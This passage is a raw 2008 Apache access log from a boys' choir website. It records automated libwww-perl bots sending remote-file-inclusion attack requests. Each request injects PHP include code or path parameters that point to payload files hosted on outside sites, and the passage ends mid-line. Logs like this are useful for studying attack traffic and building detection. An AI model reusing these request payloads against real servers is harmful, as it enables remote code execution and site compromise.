219.117.239.114 - - [20/Aug/2008:05:56:04 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
74.54.21.66 - - [20/Aug/2008:05:56:04 -0700] "GET /logs/access_080807.log/?path[docroot]=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:56:04 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
74.54.21.66 - - [20/Aug/2008:05:56:05 -0700] "GET /logs/access_080807.log/?path[Bdocroot]=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:56:05 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:56:05 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
89.108.67.131 - - [20/Aug/2008:05:56:16 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:56:31 -0700] "GET /logs/access_080729.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:56:31 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:56:32 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
89.108.67.131 - - [20/Aug/2008:05:56:47 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
74.54.21.66 - - [20/Aug/2008:05:56:53 -0700] "GET /?path[Bdocroot]=http://warsector.ru/access2006.log??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
89.208.43.121 - - [20/Aug/2008:05:57:00 -0700] "GET /logs/access_080807.log//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.seaofgreenclan.com/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
89.208.43.121 - - [20/Aug/2008:05:57:00 -0700] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.seaofgreenclan.com/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
89.208.43.121 - - [20/Aug/2008:05:57:01 -0700] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.seaofgreenclan.com/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:57:05 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:57:05 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:57:06 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:57:06 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
74.54.21.66 - - [20/Aug/2008:05:57:06 -0700] "GET /?path[docroot]=http://warsector.ru/access2006.log??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:57:06 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
89.208.43.121 - - [20/Aug/2008:05:57:07 -0700] "GET /l